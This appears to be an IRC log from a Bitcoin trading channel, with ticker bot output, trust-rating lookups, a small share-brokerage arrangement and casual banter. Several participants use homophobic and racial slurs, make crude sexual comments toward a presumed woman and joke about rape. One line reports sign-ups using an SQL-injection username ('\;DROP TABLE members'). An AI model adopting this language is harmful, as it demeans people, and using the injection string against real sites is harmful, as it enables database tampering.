stopped being an oper. Aug 21 05:05:47 efnut opers are all faggots Aug 21 05:05:50 its a prereq Aug 21 05:08:25 [GLBSE] [BTCWEB] 10 @ 0.11 = 1.1 BTC [+] Aug 21 05:08:41 dub: yeah pretty much Aug 21 05:08:42 pretty much Aug 21 05:08:44 but this was over a decade ago Aug 21 05:08:49 back when efnet was the only real network Aug 21 05:08:49 there were some cool ones Aug 21 05:08:54 but their ircd was forced to delink Aug 21 05:09:04 cause the faggot opers didn't like them Aug 21 05:09:10 remember when morgan was an ircop, lol Aug 21 05:09:14 what a joke that Aug 21 05:09:26 morgan, main writer for GOBBLES Aug 21 05:10:25 blackened used to be such a cool server Aug 21 05:11:35 I left efnet when the opers killed #nanog Aug 21 05:11:47 i dont even think any of the original efnet ircds are left Aug 21 05:11:53 prison.net , but its not even the same server/isp Aug 21 05:11:53 they arent Aug 21 05:11:56 even prison.net is a new one Aug 21 05:11:58 lol Aug 21 05:12:08 prison.net was always sketchy Aug 21 05:12:09 rg: but yes, I was an oper on blackened Aug 21 05:12:15 no offiicial sponsor, etc Aug 21 05:12:19 and I was baus. Aug 21 05:12:21 just happened to exist Aug 21 05:12:32 NSA FRONT Aug 21 05:12:49 rg: I mean hell, I remember when efnet's name had meaning Aug 21 05:12:52 qeast.net was a front Aug 21 05:12:54 we got it shutoff Aug 21 05:12:59 somehow.. i feel like ... we're just missing dandan Aug 21 05:13:04 it was being hosted by an admin at a .qc.ca univ Aug 21 05:13:11 wthout the permission of management Aug 21 05:13:13 so we contacted them Aug 21 05:13:20 after an abusive oper from there messed with us Aug 21 05:13:24 within a week it was gone Aug 21 05:13:57 btw i won that 5BTC casascious corn Aug 21 05:13:59 coin* Aug 21 05:14:02 on bitdraw Aug 21 05:14:05 hehe Aug 21 05:14:05 corn Aug 21 05:14:08 OM NOM NOM Aug 21 05:14:15 somehow i didn't win the 10 btc one Aug 21 05:14:23 even tho i fucking stacked the deck Aug 21 05:15:31 ohlol Aug 21 05:15:39 forgot i was mining scamcorns Aug 21 05:16:19 whats scamcorns ? Aug 21 05:16:29 "balance" : 15085.09000000, Aug 21 05:16:43 wat are those even worth? Aug 21 05:16:44 tell me you're not mining ppcoin Aug 21 05:16:47 ppcoin Aug 21 05:16:47 please Aug 21 05:16:51 oh god Aug 21 05:16:55 someone ban dub Aug 21 05:16:59 wai Aug 21 05:17:04 to save you from yourself Aug 21 05:17:08 sorry rg, i tried Aug 21 05:17:11 it didn't work Aug 21 05:17:13 I don't always mine scamcorns, but I always mine scamcorns Aug 21 05:17:24 what's it mean again Aug 21 05:17:28 penis piss coin Aug 21 05:17:48 penis pump coin Aug 21 05:17:58 that coin is going to go about as far as rapeCoin would Aug 21 05:18:01 i think this chan is unbannable. Aug 21 05:18:13 im sure I could get banned Aug 21 05:18:13 o no fucking way. srsly ?! penis pump coin ?! Aug 21 05:18:20 proof of stake is the bad kind of elitist Aug 21 05:18:35 gaycat ~/trollascii/* Aug 21 05:18:57 ban in a can Aug 21 05:19:05 smickles: try gay.pl Aug 21 05:19:07 oh wait, i can do that here Aug 21 05:19:12 irsii troll script Aug 21 05:19:23 ;;google gaycat ~/trollascii/* Aug 21 05:19:23 No matches found. Aug 21 05:19:27 D: Aug 21 05:19:43 ;;google gay.pl Aug 21 05:19:44 Gay.pl - Encyclopedia Dramatica: ; GAY.PL | Polski GEJ Portal | English: ; xchat.org • View topic - gay.pl: Aug 21 05:22:25 [GLBSE] [RSM] 3 @ 0.26 = 0.78 BTC [+] Aug 21 05:22:46 and trollascii is on github Aug 21 05:22:56 [GLBSE] [ASICMINER] 7 @ 0.099 = 0.693 BTC [+] Aug 21 05:23:18 o lol, github is tits Aug 21 05:25:31 rg: man, did nenolod ever tell you what I did with a combination of perl and tor? Aug 21 05:26:38 !ticker mpoe.etf Aug 21 05:26:40 [GLBSE:MPOE.ETF] [Bid: 1.36] [Ask: 1.4] [Spread: 0.04] [Last: 1.4] [24hVol: 2.8] [7dAvg: 1.40159981] Aug 21 05:27:08 technically, mpoe.etf is worth more that that ask Aug 21 05:27:24 !ticker s.mpoe Aug 21 05:27:26 [MPEX:S.MPOE] 1day: 0.0003536 / 0.00039099 / 0.00041245 (8031855 shares, 3,140.44 BTC), 30day: 0.0001 / 0.00036289 / 0.00041245 (53290518 shares, 19,339.11 BTC) Aug 21 05:27:46 .py 0.00039099 * 4000000 / 1000 Aug 21 05:27:47 1.56396 Aug 21 05:27:50 1.56 Aug 21 05:28:11 it's a huge ask wall tho Aug 21 05:28:18 >10% of the shares Aug 21 05:28:55 well maybe they bought in at .1 or w/e Aug 21 05:29:45 i know kakobrekla bought the first share, i wonder if he(?) still has it Aug 21 05:30:13 he has a gooolden tickeeet Aug 21 05:30:22 :D Aug 21 05:30:43 tbh i must confess, i always picture kakobrekla as a girl. Aug 21 05:31:22 no girls on internet Aug 21 05:32:07 isn't rg a girl ? Aug 21 05:32:20 yeah, look at the pic Aug 21 05:32:27 def. a girl Aug 21 05:32:40 i'd do 'em Aug 21 05:33:23 really now, unless usagi was trollin us Aug 21 05:33:33 there's at least one who frequents here Aug 21 05:34:05 usagi is zhao tong Aug 21 05:34:24 damn, toobad i con't remember that youtube chan she said was hers Aug 21 05:34:35 im watching the dictator Aug 21 05:34:36 for the first time Aug 21 05:34:36 wait, usagi is a girl ? Aug 21 05:34:37 and yes Aug 21 05:34:38 i am a girl Aug 21 05:34:44 mircea_popescu: no Aug 21 05:34:46 and neither is rg Aug 21 05:34:46 hawt girl Aug 21 05:34:51 nenolod has met rg Aug 21 05:34:57 basically irc is like prison Aug 21 05:35:06 the noobs play the girl Aug 21 05:35:13 lol Aug 21 05:35:16 I'm a famous Japanese singer. Which is why I must be anonymous. Aug 21 05:35:27 do you sing with your wet part ? Aug 21 05:35:27 give that youtube chan again Aug 21 05:35:51 even if it isn't you, that's an entertaining chan Aug 21 05:36:02 usagi: and adrogenous Aug 21 05:36:05 i can't believe all the downvotes Aug 21 05:36:22 IMPORTANT ANNOUNCEMENT : If you build a BTC based business you haven't really built it. It was really Satoobama. Aug 21 05:36:33 https://www.youtube.com/watch?v=7rF6lgnfCfI Aug 21 05:36:34 smickles: that fucking weabo one you posted Aug 21 05:36:37 ? Aug 21 05:36:40 SATANBAMA Aug 21 05:36:45 magicalusagi or someshit Aug 21 05:36:46 weabo? Aug 21 05:36:49 Satbango? Aug 21 05:37:04 ;;ud weabo Aug 21 05:37:05 http://www.urbandictionary.com/define.php?term=weabo | A person who says the word, "kawaii" consistently, because of their kawaii obsession. Aug 21 05:37:13 peko peko peko~ Aug 21 05:37:13 what's a kawaii even Aug 21 05:37:15 erp Aug 21 05:37:27 [GLBSE] [ARS] 50 @ 0.01 = 0.5 BTC [-] Aug 21 05:37:27 its an english word. Aug 21 05:37:28 im so old ;/ Aug 21 05:37:28 its a wannabe chink anyway Aug 21 05:37:28 duh. Aug 21 05:37:54 dub: yeah, i think so Aug 21 05:37:59 peko peko peko lmao. Aug 21 05:38:10 you know Aug 21 05:38:11 this reminds me of https://www.youtube.com/watch?v=yunSRfnsVck Aug 21 05:38:16 dammit usagi, do you just not remember what you trolled me with? Aug 21 05:38:21 we should be glad its south korea and not japan that likes starcraft Aug 21 05:38:27 i should've bookmarked it Aug 21 05:38:48 isnt usage an anime character? Aug 21 05:38:55 usagi even Aug 21 05:39:09 dont think so Aug 21 05:39:13 not from any anime Ive seen Aug 21 05:39:34 mk so mpoe is over 10k in capital requirements this month Aug 21 05:39:40 it was in the 1k range back in april Aug 21 05:39:41 yeah its a cartoon rabbit Aug 21 05:39:49 if it needs 100k in another 4 months i might be in trouble. Aug 21 05:39:51 i heard that that trolololo guy recently died, and there was an internet memorial that day Aug 21 05:40:00 that other nick it uses tsukino is antoher cartoon thing Aug 21 05:40:07 usagi... Aug 21 05:40:11 No Aug 21 05:40:20 [GLBSE] [PUREMINING] 4 @ 0.13899999 = 0.556 BTC [+] Aug 21 05:40:21 It's really my name lol Aug 21 05:40:25 dub: no, usagi is the japanese name for rabbit Aug 21 05:40:28 https://www.youtube.com/watch?v=7rF6lgnfCfI <--- not a cartoon Aug 21 05:40:36 mircea_popescu: you don't get enough from the bonds? (i don't pay attention) Aug 21 05:40:45 tsukino usagi Aug 21 05:40:52 smickles for now i do. im not sure it scales. Aug 21 05:40:53 http://www.tripadvisor.ca/Hotel_Review-g298123-d1117727-Reviews-Tsukino_Usagi-Ito_Shizuoka_Prefecture_Chubu.html <--- not a cartoon or a singer. Aug 21 05:41:00 It's just a name. Aug 21 05:41:01 usagi: how do i know that's not a vocaloid? Aug 21 05:41:04 dub: sorry, dont know that one Aug 21 05:41:06 That's it. It's just my name. Aug 21 05:41:15 usagi but what does it mean ? Aug 21 05:41:21 Diablo-D3: the fact that you _know_ any anime makes you a huge faggot Aug 21 05:41:29 inb4 "we're americans baby. our names don;t mean shit" Aug 21 05:41:37 dub: not really, I watch the ultraviolent shit Aug 21 05:41:37 Does mircea popescu mean micecream popescicle? Aug 21 05:41:43 mircea_popescu: it should scale, but i bet there's an amount of lag Aug 21 05:41:46 usagi it can. Aug 21 05:41:47 It's a Japanese name lol Aug 21 05:42:05 that was so cute btw :D Aug 21 05:42:19 you know Aug 21 05:42:26 pero pero pero yo Aug 21 05:42:27 I wonder if they ever translated usagi yojimbo to english Aug 21 05:42:47 Diablo-D3 usagi yo! jimbo wales ? Aug 21 05:43:03 no Aug 21 05:43:06 what? Aug 21 05:43:10 i dunno. Aug 21 05:43:22 huh, apparently that comic IS english Aug 21 05:43:29 jimbo wales or jumbo wales Aug 21 05:43:33 blue wales Aug 21 05:43:36 scotland and wales Aug 21 05:43:56 aw, toobad i can't remember that excellent dada line from about the same time mircea_popescu originally gave me that zappa link Aug 21 05:44:09 mircea_popescu: Im largely ignoring you Aug 21 05:44:17 oh and http://www.youtube.com/watch?v=MsVlYjHuJOE Aug 21 05:44:23 is usagi's channel Aug 21 05:44:26 http://www.afka.net/Articles/1979-04_Oui.htm Aug 21 05:44:27 according to my logs Aug 21 05:44:35 !!!!!!!!!!!!!!!11 Aug 21 05:44:40 that's it :D Aug 21 05:44:54 [MPEX] [S.MPOE] 19798 @ 0.00036808 = 7.2872 BTC [-] Aug 21 05:44:55 [MPEX] [S.MPOE] 30022 @ 0.00038917 = 11.6837 BTC [+] Aug 21 05:44:57 [MPEX] [S.MPOE] 6180 @ 0.00038935 = 2.4062 BTC [+] Aug 21 05:45:08 damn dub you have excellent log skills Aug 21 05:45:17 what's with the makeup Aug 21 05:45:38 mircea_popescu: you have to watch the progression of videos until the end Aug 21 05:45:42 ワウ!! dubsan remembers my channel Aug 21 05:45:54 grep > memory Aug 21 05:45:54 she'd be better if she had a beard. Aug 21 05:45:54 I am so honored dubsan! Aug 21 05:45:57 >dubsan Aug 21 05:46:06 egrep actually Aug 21 05:46:09 [GLBSE] [ARS] 50 @ 0.01 = 0.5 BTC [-] Aug 21 05:46:49 you know why I want to read usagi yojimbo? Aug 21 05:46:57 dub egrep that dada line, it was something like 'the thing from that place' Aug 21 05:46:58 for exactly one panel, which probably isnt even real Aug 21 05:47:01 or something like that Aug 21 05:47:11 usagi standing on top of a pile of bodies saying Aug 21 05:47:16 TRICKS ARE FOR RABBITS, BITCHES Aug 21 05:48:46 dub, you find that line, (or fake one good enough to fool me) and I'll give you a coin Aug 21 05:49:00 (1 btc for clairity) Aug 21 05:50:20 anyone seen draco49 lately ? Aug 21 05:52:08 [MPEX] [S.MPOE] 12320 @ 0.00038935 = 4.7968 BTC [+] Aug 21 05:52:09 [MPEX] [S.MPOE] 18977 @ 0.00039353 = 7.468 BTC [+] Aug 21 05:52:11 [MPEX] [S.MPOE] 24703 @ 0.00040482 = 10.0003 BTC [+] Aug 21 05:54:10 www.youtube.com/watch?v=vB9tlPeLX1Y Aug 21 05:55:08 smickles: no dice Aug 21 05:55:56 damn Aug 21 05:56:28 dub satoshi dice! Aug 21 05:56:54 logs don't go back that far Aug 21 05:57:18 move vps in may/june Aug 21 05:57:55 29-06-12-11:50 You could say that driving a tractor trailer to work instead of a car is like riding an elephant on a foxhunt inst Aug 21 05:57:58 ead of a horse. But saying that telnet is like a butterknife in place of a screwdriver is unjustified -- what is the relevance? Aug 21 05:58:07 [GLBSE] [YABMC] 6 @ 0.1319 = 0.7914 BTC [-] Aug 21 05:58:09 funny Aug 21 05:58:41 just incase you were looking for usagi to say that line which i'm talking about, it wasn't usagi Aug 21 05:59:02 I wasnt Aug 21 05:59:16 it was this channel though? Aug 21 05:59:27 oh sht, was it? Aug 21 06:00:38 maybe it was -otc-eu Aug 21 06:01:30 oh well, nanotube will probably give you logs on request if gribble is in there Aug 21 06:01:45 Guys stop trying to sql inject my website it won't work Aug 21 06:01:46 then, egrep '(thing.*from.*place)' filename Aug 21 06:01:53 Your using up valuable beta accounts Aug 21 06:02:13 ahaha noway Aug 21 06:02:15 Some idiot is doing accts like \;DROP TABLE members Aug 21 06:02:51 so if we have real girl in here I better clean up my game Aug 21 06:03:13 dub, thx for the tip Aug 21 06:03:43 usagi: girl you must be from stdout because I'd like to pipe you Aug 21 06:03:48 usagi: shouldn't you welcome stuff like that? Aug 21 06:03:49 [GLBSE] [BIB.PIRATE] 4 @ 0.7201 = 2.8804 BTC [+] Aug 21 06:03:49 [GLBSE] [BIB.PIRATE] 15 @ 0.71 = 10.65 BTC [-] Aug 21 06:04:18 besides, it's not like \;DROP TABLE members is a bad username Aug 21 06:04:29 There are bitcoins in the system now, Aug 21 06:04:47 what's the other good one? \b\b\b\b\b ~something Aug 21 06:04:48 ? Aug 21 06:06:46 < dub> usagi: girl you must be from <<< dub, do you ever sit there and wonder why there seem to be no women on the internet? Aug 21 06:07:09 granted, that was a very entertainging line Aug 21 06:07:34 there's no women ON the internet cause the internet likes being on top. Aug 21 06:07:42 lol Aug 21 06:08:27 girl, you must be the aeon flux movie because I never want to see you again Aug 21 06:08:37 dude that movie sucked Aug 21 06:08:44 i used to be a fan of that ho. but srsly... Aug 21 06:09:07 [GLBSE] [PUREMINING] 100 @ 0.13899999 = 13.9 BTC [+] Aug 21 06:09:24 them: So I could be a broker if I pay the 20BTC? Aug 21 06:09:24 me: sure. prolly pretty good business actually, can never have too many of those. Aug 21 06:09:24 them: I'll go see if I can see what rate brokers charge. Very interesting business model. Aug 21 06:09:30 from this i gather i suck. Aug 21 06:09:49 no you don't Aug 21 06:10:00 just want to see what options I have Aug 21 06:10:36 o hey! Aug 21 06:10:41 dude, i'm fine with being a broker Aug 21 06:10:43 i was just being sarcastic Aug 21 06:11:03 and Rothgar, you wanna see what options you have, i'm working on that Aug 21 06:11:11 what fee do you charge smickles Aug 21 06:11:35 right now, since it's 'pen and paper' 1% or .5btc, whichever is less Aug 21 06:11:46 but i'll lower it when i get the web ui going Aug 21 06:12:02 weren't you doing 3% ? Aug 21 06:12:08 or was that brendio Aug 21 06:12:09 shit, sorry Aug 21 06:12:16 yeah, i mistyped Aug 21 06:12:18 it's 3 Aug 21 06:12:25 o i c. i just ruined it :D Aug 21 06:12:43 i heard brend was doin 10 Aug 21 06:12:45 yea mircea_popescu I'm doing business here Aug 21 06:12:46 [GLBSE] [FPGAMINING] 22 @ 0.921 = 20.262 BTC [+] Aug 21 06:12:50 lol sorry Aug 21 06:13:13 smickles well considering he has to deal with the forum types i'd say 10% is less than 3% :D Aug 21 06:13:26 i'd charge like 70 Aug 21 06:13:30 smickles: so how do I know I own the shares? Do I need to trust you Aug 21 06:13:34 ooooh, ther're not all that bad mircea_popescu Aug 21 06:13:35 ? Aug 21 06:13:52 Rothgar: essentially, yes, you do need to trust me Aug 21 06:14:06 [GLBSE] [TYGRR.BOND-P] 1 @ 0.805 BTC [-] Aug 21 06:14:07 [GLBSE] [TYGRR.BOND-P] 100 @ 0.8 = 80 BTC [-] Aug 21 06:14:09 [GLBSE] [TYGRR.BOND-P] 65 @ 0.79 = 51.35 BTC [-] Aug 21 06:14:10 [GLBSE] [TYGRR.BOND-P] 100 @ 0.78 = 78 BTC [-] Aug 21 06:14:11 [GLBSE] [TYGRR.BOND-P] 14 @ 0.77 = 10.78 BTC [-] Aug 21 06:14:11 i can point to my -otc WOT rating Aug 21 06:14:17 and I would have to find you to sell? Aug 21 06:14:36 yes, for now, but i'll give you my personal email addy Aug 21 06:14:43 and i'm a 'stay at home dad' Aug 21 06:14:50 he actually rises some interesting points Aug 21 06:14:53 so it should work out 'ok' Aug 21 06:15:19 once i get the web ui going, you won't need to 'find me' Aug 21 06:15:27 Sure point me to your otc rating please Aug 21 06:15:34 what the heck will i do if x months down the road a broker is awol and well... these people own shares through them Aug 21 06:15:38 ;;getrating smickles Aug 21 06:15:38 Currently authenticated from hostmask smickles!~smickles@184.154.30.40 . User smickles, rated since Wed Jan 4 18:28:52 2012. Cumulative rating 53, from 34 total ratings. Received ratings: 34 positive, 0 negative. Sent ratings: 38 positive, 1 negative. Details: http://bitcoin-otc.com/viewratingdetail.php?nick=smickles Aug 21 06:15:41 ;;ident Aug 21 06:15:42 You are identified as user smickles, with GPG key id EA62D7CEB2450C3F, key fingerprint 96ACCA7C3B09EC61B0A6D7F9EA62D7CEB2450C3F, and bitcoin address 12NjnZTVeTJ3g5C7BqfS2aQ2rLkmwiqVz6 Aug 21 06:15:53 getrating says if you're authed smickles Aug 21 06:16:22 (sry for the duplication of data then) Aug 21 06:16:41 isn't usagi a girl? Aug 21 06:16:42 Rothgar: also, it's good practice to ask around Aug 21 06:16:48 or is that just part of the persona Aug 21 06:17:03 copumpkin no, she's just a cucurbitacean Aug 21 06:17:14 my bitcointalk username is also smickles Aug 21 06:17:43 mircea_popescu: no that's me Aug 21 06:17:52 you're a girl ? Aug 21 06:17:57 (for s&g) my gaia username is 'Thomas A. Anderson' Aug 21 06:18:03 [GLBSE] [BIB.PIRATE] 8 @ 0.96 = 7.68 BTC [+] Aug 21 06:18:18 hmm Aug 21 06:20:06 s&g ? Aug 21 06:20:14 shits and giggles Aug 21 06:20:21 or grins Aug 21 06:20:25 o Aug 21 06:20:48 [MPEX] [S.MPOE] 9800 @ 0.00036989 = 3.6249 BTC [-] Aug 21 06:21:11 mircea_popescu: do you even know what gaia is? Aug 21 06:21:15 ;;ident Aug 21 06:21:15 You are identified as user Rothgar, with GPG key id 4FB28DD8EA18EA0A, key fingerprint 4BF10B4D89E0A466BA83328D4FB28DD8EA18EA0A, and bitcoin address None Aug 21 06:21:33 ;;getrating Rothgar Aug 21 06:21:34 Currently authenticated from hostmask Rothgar!d8aac070@gateway/web/freenode/ip.216.170.192.112 . User rothgar, rated since Fri Apr 8 13:59:53 2011. Cumulative rating 40, from 26 total ratings. Received ratings: 26 positive, 0 negative. Sent ratings: 28 positive, 0 negative. Details: http://bitcoin-otc.com/viewratingdetail.php?nick=rothgar Aug 21 06:21:44 smickles not rly. Aug 21 06:21:49 ;;gettrust smickles Aug 21 06:21:49 Trust relationship from user Rothgar to user smickles: Level 1: 1, Level 2: 0 via 0 connections. Graph: http://serajewelks.bitcoin-otc.com/trustgraph.php?source=Rothgar&dest=smickles Aug 21 06:22:20 Hey smickles I guess I did business with you before Aug 21 06:22:24 [GLBSE] [BTCMC] 1 @ 0.6001 BTC [+] Aug 21 06:22:28 lol, i was just noticing that Aug 21 06:23:24 O.K. I think I want to buy s.dice Aug 21 06:23:37 mircea_popescu: www.gaiaonline.com Aug 21 06:23:50 Rothgar: would you like to take this to pm? Aug 21 06:23:58 yes Aug 21 06:27:39 does anyone know where i can get a pic of the world trade center Aug 21 06:27:41 before and after Aug 21 06:27:47 not after then when ti was all rubble Aug 21 06:27:51 like after they cleaned it up Aug 21 06:27:57 the land Aug 21 06:27:58 i mean Aug 21 06:28:00 google i'd guess Aug 21 06:28:40 [GLBSE] [BIT.INC] 5 @ 0.11 = 0.55 BTC [+] Aug 21 06:29:11 WHAT IS THIS BIT INC Aug 21 06:29:17 THEY HAVE INFRINGED UPON MY TRADEMARK Aug 21 06:29:22 lol ? Aug 21 06:29:27 [GLBSE] [TEEK.B] 10 @ 0.9 = 9 BTC [-] Aug 21 06:29:31 omg Aug 21 06:29:35 i am going to sue the fuck out of them Aug 21 06:29:43 we are Bit, Inc Aug 21 06:29:43 you own "inc" ? Aug 21 06:29:47 or Bit Services, Inc Aug 21 06:29:52 we have both Aug 21 06:30:02 go sue them in forum court Aug 21 06:30:06 for maximum lulz Aug 21 06:35:13 ok Aug 21 06:35:18 the dictator was pretty funny Aug 21 06:35:28 i went into it with extremely low hopes Aug 21 06:35:30 but it wasnt bad Aug 21 06:36:31 [MPEX] [F.GIGA.ETF] 8300 @ 0.00104061 = 8.6371 BTC [-] Aug 21 06:36:32 [MPEX] [F.GIGA.ETF] 500 @ 0.00102072 = 0.5104 BTC [-] Aug 21 06:36:34 [MPEX] [S.MPOE] 51471 @ 0.00040262 = 20.7233 BTC [+] Aug 21 06:36:35 [MPEX] [S.MPOE] 1397 @ 0.00040482 = 0.5655 BTC [+] Aug 21 06:36:36 [MPEX] [S.MPOE] 43500 @ 0.00040653 = 17.6841 BTC [+] Aug 21 06:36:38 [MPEX] [S.MPOE] 3632 @ 0.00041125 = 1.4937 BTC [+] Aug 21 06:37:24 ;;rate smickles 1 equity Aug 21 06:37:24 Rating entry successful. Your rating for user smickles has changed from 1 to 1. Aug 21 06:40:52 progress! Aug 21 06:44:16 what going on baby Aug 21 06:45:11 not much. Aug 21 06:46:40 ;;ticker Aug 21 06:46:41 Best bid: 10.19899, Best ask: 10.1998, Bid-ask spread: 0.00081, Last trade: 10.1998, 24 hour volume: 145696, 24 hour low: 8.62333, 24 hour high: 10.5 Aug 21 06:46:46 heh Aug 21 06:48:27 ;;ident Aug 21 06:48:27 You are identified as user Rothgar, with GPG key id 4FB28DD8EA18EA0A, key fingerprint 4BF10B4D89E0A466BA83328D4FB28DD8EA18EA0A, and bitcoin address None Aug 21 06:54:16 [GLBSE] [NYAN.C] 3 @ 0.985 = 2.955 BTC [+] Aug 21 06:54:17 [GLBSE] [NYAN.C] 6 @ 0.988 = 5.928 BTC [+] Aug 21 06:57:09 man Aug 21 06:57:15 this btc-e chat is worse than otc/assets combined Aug 21 06:57:36 this one guy cant decide if pirate is defaulting or manipulating the maret Aug 21 06:57:40 he switches every 10 minutes Aug 21 06:57:47 BTC MINING IS CANDIAN? Aug 21 06:57:49 WHAT THE FUCK Aug 21 06:58:06 btc-mining: rumor is you forgot to pay divs Aug 21 06:58:08 just a heads up Aug 21 06:58:19 BTC-Mining: PAY YOUR FUCKIGN DIVIDENDS NOOB Aug 21 06:58:59 Can't pay until Amazingrando pays and he's always travelling. He hadn't paid yet this morning Aug 21 06:59:10 yeah so stfu patrick Aug 21 06:59:46 BTC-Mining: GODDAMNIT Aug 21 07:00:29 What's the hurry about those divs? Aug 21 07:00:45 Last time he was this late he paid a few BTC extra Aug 21 07:00:56 just want them =/ Aug 21 07:00:56 [GLBSE] [BITBOND] 3 @ 0.3797 = 1.1391 BTC [+] Aug 21 07:00:57 [GLBSE] [BITBOND] 9 @ 0.3798 = 3.4182 BTC [+] Aug 21 07:01:33 [GLBSE] [BITBOND] 20 @ 0.3798 = 7.596 BTC [+] Aug 21 07:02:00 He usually give a small compensation when he's late, seems fine to me. I think he paid an extra twice so far around 5% Aug 21 07:02:31 Diablo-D3: be more civil, people think you're an asshat cause you go insulting people needlessly Aug 21 07:03:09 See, Nafario's Clone #1 approves. Where's Clone #2 by the way? Aug 21 07:03:15 Nefario's* Aug 21 07:03:47 clones take time to grow Aug 21 07:03:51 you know how much it costs Aug 21 07:04:02 sitching to bigger tubes when they grow? Aug 21 07:04:29 Ah, I see. So how much faster is it to work on GLBSE with the two of you? Aug 21 07:04:57 BTC-Mining: it doesnt matter anyhow, Im just buying more of you with it Aug 21 07:05:46 mircea_popescu, So smickles took care of me. I won't be buying an account Aug 21 07:06:00 But thank you for answering all of my questions. Aug 21 07:06:15 Spreading risk between ASICMINER and BFL? Aug 21 07:06:36 hctib thats fine! Aug 21 07:06:47 (i don't even remember answering q's ?) Aug 21 07:06:57 o o rothgar. kk Aug 21 07:06:59 you still get a fee when I sell, so everyone wins. Aug 21 07:07:02 Yes Aug 21 07:07:04 BTC-Mining: no, but that sounds like a great idea Aug 21 07:07:05 ;;ident Aug 21 07:07:06 You are identified as user Rothgar, with GPG key id 4FB28DD8EA18EA0A, key fingerprint 4BF10B4D89E0A466BA83328D4FB28DD8EA18EA0A, and bitcoin address None Aug 21 07:07:25 bye now Aug 21 07:07:28 hey, im all for it either way. somebody should only make an account if it actually makese snese for them Aug 21 07:07:29 laters. Aug 21 07:07:43 :) Aug 21 07:08:07 extra divs for being late Aug 21 07:08:09 that's not a bad idea Aug 21 07:08:52 its better to not be late imo. Aug 21 07:10:05 ;;ticker Aug 21 07:10:06 Best bid: 10.12999, Best ask: 10.13, Bid-ask spread: 0.00001, Last trade: 10.13, 24 hour volume: 142727, 24 hour low: 8.62333, 24 hour high: 10.5 Aug 21 07:10:10 aha@ Aug 21 07:10:31 [GLBSE] [FPGAMINING] 2 @ 0.97 = 1.94 BTC [+] Aug 21 07:10:48 [MPEX] [S.MPOE] 50000 @ 0.00039643 = 19.8215 BTC [-] Aug 21 07:11:35 10.12 eh? Aug 21 07:11:52 shweet Aug 21 07:11:56 time to put some mad expensive shares of bvps up Aug 21 07:11:58 well, i feel like i don't loose until <1 Aug 21 07:12:10 i like our current price Aug 21 07:12:12 its funny Aug 21 07:12:14 theres bots on mpex Aug 21 07:12:20 they buy random shit Aug 21 07:12:23 the second they do Aug 21 07:12:25 they relist it Aug 21 07:12:27 +.001 Aug 21 07:12:37 that little? Aug 21 07:12:47 well our stock price is 0037 Aug 21 07:13:25 so rg, did you lose all respect for my coding skillz after you friend had a look at my code? Aug 21 07:13:31 there's people playing around for sure. Aug 21 07:13:44 smickles: no but Aug 21 07:13:48 theres a LOT of work to do Aug 21 07:13:53 like a real lot Aug 21 07:14:03 its a great base tho Aug 21 07:14:06 his words, not mine Aug 21 07:14:17 that's nice to hear Aug 21 07:14:25 rg is cornering his own market hehehe Aug 21 07:14:33 i feel like i've improved greatly since then too Aug 21 07:14:48 [MPEX] [S.BVPS] 500 @ 0.00363919 = 1.8196 BTC [-] Aug 21 07:15:02 SHIT Aug 21 07:15:11 much more readability, better structure, and beter comments Aug 21 07:15:11 someone did that to piss me off Aug 21 07:15:12 didn't they Aug 21 07:15:27 hahaha Aug 21 07:15:41 [MPEX] [S.BVPS] 1 @ 0.00363919 BTC [-] Aug 21 07:15:47 lol Aug 21 07:15:50 lmao. i guess it's 1 for yes 0 for no Aug 21 07:16:35 ;;bids 8 Aug 21 07:16:37 There are currently 46043.808 bitcoins demanded at or over 8.0 USD, worth 394879.595799 USD in total. Aug 21 07:16:45 ;;bids 9.5 Aug 21 07:16:47 There are currently 3315.8592 bitcoins demanded at or over 9.5 USD, worth 32074.3527359 USD in total. Aug 21 07:16:59 not much padding Aug 21 07:17:17 the problem with btc is that everyone is hoarding it Aug 21 07:17:23 and as a result price can fluctuate wildly. Aug 21 07:17:24 [GLBSE] [MMM] 8 @ 0.7 = 5.6 BTC [+] Aug 21 07:17:25 [GLBSE] [MMM] 1 @ 0.8 BTC [+] Aug 21 07:18:18 mircea, why use gribble's bids/asks feature? Aug 21 07:18:21 http://www.bitcoincharts.com/markets/mtgoxUSD.html Aug 21 07:18:26 after girls hit menopause Aug 21 07:18:30 Bookmark this Aug 21 07:18:30 does their vagina not get wet anymore? Aug 21 07:18:36 use btccharts.com Aug 21 07:18:39 its hosted by bitvps Aug 21 07:18:42 It's better to see the market depth Aug 21 07:18:43 or bitcoin.clarkmoody.com Aug 21 07:18:45 its hosted by bitvps Aug 21 07:18:47 or Aug 21 07:18:53 BTC-Mining i actually have it Aug 21 07:18:56 I use clarkmoody to watch market live Aug 21 07:19:01 and trade Aug 21 07:19:04 It's awesome Aug 21 07:19:05 i was just messing around with g. Aug 21 07:19:07 clarkmoody should be a ton faster Aug 21 07:19:19 i gave clark a db cluster Aug 21 07:19:22 even when there's lag, seems faster than anything else to see depth and live trades Aug 21 07:19:39 aye Aug 21 07:20:30 shit Aug 21 07:20:35 i need to update the server mgmt on bitvps Aug 21 07:20:38 im using RC1 Aug 21 07:20:43 RC1u5 is out Aug 21 07:20:55 btccharts.com is flash based Aug 21 07:21:21 yeah Aug 21 07:21:24 it doesnt even work with my flash Aug 21 07:21:26 i dont have flash Aug 21 07:24:12 mircea_popescu: do you use links2 (or similar) or do you just disable all that junk in a popular browser? Aug 21 07:24:44 i do both. i have lynx and also opera Aug 21 07:24:51 and yea, sometimes i wget Aug 21 07:24:58 it's sorta like going ;;bids Aug 21 07:25:58 /exec wget google.com Aug 21 07:26:18 not for google com Aug 21 07:26:23 /cat index.html Aug 21 07:26:26 mircea Aug 21 07:26:32 any ideas about my menopause questionm? Aug 21 07:26:32 yes rape Aug 21 07:26:44 women get wet at any age, menopause has nothing to do Aug 21 07:26:49 menopause just stops them bleeding. Aug 21 07:27:14 okay Aug 21 07:27:16 cool thanks Aug 21 07:27:17 deer god!, that was about 5 pages of code for google.com Aug 21 07:27:27 smickles that's their trick now Aug 21 07:27:29 they make it LOOK simple Aug 21 07:27:31 but in reality Aug 21 07:27:36 theres 8 pages of js behind it Aug 21 07:28:00 yeah google is an utter mess. Aug 21 07:28:42 wow, i feel like i'm writing the cleanist code evar after looking at that mess Aug 21 07:28:53 sniffing all your keystrokes takes work Aug 21 07:29:34 no Aug 21 07:29:36 if you wanna see mess Aug 21 07:29:38 login to facebook Aug 21 07:29:53 facebook makes google look like helloword.c Aug 21 07:29:55 world* Aug 21 07:30:03 hello WORD Aug 21 07:30:03 pq if qkqc false pc ? Aug 21 07:30:28 all this nicotine juice i bought Aug 21 07:30:29 is 